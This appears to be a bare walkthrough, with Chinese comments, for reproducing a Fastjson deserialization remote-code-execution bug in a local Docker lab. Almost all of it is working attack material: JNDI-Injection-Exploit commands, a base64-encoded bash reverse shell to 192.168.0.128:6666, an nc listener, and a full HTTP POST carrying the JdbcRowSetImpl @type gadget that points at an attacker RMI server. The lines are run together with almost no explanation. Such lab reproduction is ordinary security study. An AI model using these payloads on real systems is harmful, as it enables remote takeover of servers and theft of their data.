docker-compose up -d #启动镜像，整个过程比较久，耐心等待

环境搭建完毕，访问http://192.168.0.140:8090/，得到如下页面

Content-Type:application/json{"name":"alsly","age":20}

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "要执行的命令" -A "vpsip"java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/access" -A "192.168.0.1"

docker psdocker exec -it 容器id bashdocker exec -it cdb842d6e03c bash

bash -i >& /dev/tcp/192.168.0.128/6666 0>&1-> YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI4LzY2NjYgMD4mMQ==  #base64编码java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.0.1"

nc -lvvp 6666

POST / HTTP/1.1Host: 192.168.0.140:8090User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Content-Type:application/jsonAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Length: 266

{    "a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://192.168.0.1:1099/dab1pj",        "autoCommit":true    }}